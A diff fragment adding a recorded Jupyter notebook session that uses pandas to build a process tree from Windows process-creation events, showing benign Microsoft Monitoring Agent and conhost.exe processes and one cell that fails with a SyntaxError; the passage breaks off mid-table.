+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "children[\"path\"].str.count(\"/\")"
+    },
+    "executionTime": "2019-12-13T20:38:08.917Z"
+   },
+   {
+    "cell": {
+     "executionCount": 10,
+     "executionEventId": "42a4396e-cb4f-47d3-8ed2-f2cae8fa3a4e",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "proc_key\nc:\\program files\\microsoft monitoring agent\\agent\\monitoringhost.exe0x8641970-01-01 00:00:00.000000                                                         0\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000        1\nc:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.273000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000     1\nc:\\windows\\system32\\conhost.exe0x21c82019-02-09 23:22:56.267000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000        1\nc:\\windows\\system32\\conhost.exe0x1c242019-02-09 23:32:56.280000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000       1\nc:\\windows\\system32\\conhost.exe0x17a42019-02-10 00:02:56.270000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000    1\nc:\\windows\\system32\\conhost.exe0x1c102019-02-10 00:12:56.263000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000        1\nc:\\windows\\system32\\conhost.exe0x235c2019-02-10 00:32:56.287000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000        1\nc:\\windows\\system32\\conhost.exe0x14682019-02-09 21:32:56.290000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000       1\nc:\\windows\\system32\\conhost.exe0x12782019-02-09 20:32:56.280000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000        1\nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 22:02:56.277000                                                                                               2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000     1\nc:\\windows\\system32\\conhost.exe0x18342019-02-09 22:32:56.260000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000        1\nc:\\windows\\system32\\conhost.exe0x15f42019-02-09 22:32:56.273000                                                                                             2\nc:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000     1\nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 20:52:56.270000                                                                                              2\nName: path, dtype: int64"
+       },
+       "execution_count": 10,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "full_tree[\"path\"].str.count(\"/\")"
+    },
+    "executionTime": "2019-12-13T20:38:24.603Z"
+   },
+   {
+    "cell": {
+     "executionCount": 11,
+     "executionEventId": "368a67e1-bb9f-4fa6-88b1-c8c7b5454808",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/plain": "2"
+       },
+       "execution_count": 11,
+       "metadata": {},
+       "output_type": "execute_result"
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "full_tree[\"path\"].str.count(\"/\").max()"
+    },
+    "executionTime": "2019-12-13T20:39:04.083Z"
+   },
+   {
+    "cell": {
+     "executionCount": 12,
+     "executionEventId": "55384d35-db28-4bcc-afc2-1a97266751ad",
+     "hasError": true,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "ename": "SyntaxError",
+       "evalue": "invalid syntax (<ipython-input-12-3edf3badba07>, line 2)",
+       "output_type": "error",
+       "traceback": [
+        "\u001b[1;36m  File \u001b[1;32m\"<ipython-input-12-3edf3badba07>\"\u001b[1;36m, line \u001b[1;32m2\u001b[0m\n\u001b[1;33m    full_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]\u001b[0m\n\u001b[1;37m            ^\u001b[0m\n\u001b[1;31mSyntaxError\u001b[0m\u001b[1;31m:\u001b[0m invalid syntax\n"
+       ]
+      }
+     ],
+     "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332",
+     "text": "depth = fulltree(full_tree[\"path\"].str.count(\"/\").max()\nfull_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]"
+    },
+    "executionTime": "2019-12-13T20:43:33.070Z"
+   },
+   {
+    "cell": {
+     "executionCount": 13,
+     "executionEventId": "e51ab04f-57db-43bf-85d0-8085425efc5f",
+     "hasError": false,
+     "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef",
+     "outputs": [
+      {
+       "data": {
+        "text/html": "<div>\n<style scoped>\n    .dataframe tbody tr th:only-of-type {\n        vertical-align: middle;\n    }\n\n    .dataframe tbody tr th {\n        vertical-align: top;\n    }\n\n    .dataframe thead th {\n        text-align: right;\n    }\n</style>\n<table border=\"1\" class=\"dataframe\">\n  <thead>\n    <tr style=\"text-align: right;\">\n      <th></th>\n      <th>TenantId</th>\n      <th>Account</th>\n      <th>EventID</th>\n      <th>TimeGenerated</th>\n      <th>Computer</th>\n      <th>SubjectUserSid</th>\n      <th>SubjectUserName</th>\n      <th>SubjectDomainName</th>\n      <th>SubjectLogonId</th>\n      <th>NewProcessId</th>\n      <th>...</th>\n      <th>source_index_par</th>\n      <th>ProcessId_par</th>\n      <th>NewProcessName_par</th>\n      <th>TimeGenerated_orig_par</th>\n      <th>parent_key</th>\n      <th>IsRoot</th>\n      <th>IsLeaf</th>\n      <th>IsBranch</th>\n      <th>path</th>\n      <th>parent_index</th>\n    </tr>\n    <tr>\n      <th>proc_key</th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n      <th></th>\n    </tr>\n  </thead>\n  <tbody>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x8dc2019-02-09 21:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x8dc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/10</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xd742019-02-09 23:22:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:22:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xd74</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/107</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x6f8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/120</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1fc0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/127</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.253</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x10bc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/129</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xb48</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/139</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbd0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/15</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x15c8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/5</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xe34</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/67</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.247</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x53c</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/76</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xef4</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/78</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xcd8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/8</td>\n      <td>1004</td>\n    </tr>\n  </tbody>\n</table>\n<p>12 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \n\n                                                     SubjectUserName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1$   \n\n                                                   SubjectDomainName  \\\nproc_key                                                               \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \nc:\\program files\\microsoft monitoring agent\\age...         WORKGROUP   \n\n                                                   SubjectLogonId  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \nc:\\program files\\microsoft monitoring agent\\age...          0x3e7   \n\n                                                   NewProcessId  ...  \\\nproc_key                                                         ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x8dc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xd74  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x6f8  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x1fc0  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x10bc  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xb48  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xbd0  ...   \nc:\\program files\\microsoft monitoring agent\\age...       0x15c8  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xe34  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0x53c  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xef4  ...   \nc:\\program files\\microsoft monitoring agent\\age...        0xcd8  ...   \n\n                                                   source_index_par  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \nc:\\program files\\microsoft monitoring agent\\age...              NaN   \n\n                                                   ProcessId_par  \\\nproc_key                                                           \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \nc:\\program files\\microsoft monitoring agent\\age...           NaN   \n\n                                                   NewProcessName_par  \\\nproc_key                                                                \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \nc:\\program files\\microsoft monitoring agent\\age...                NaN   \n\n            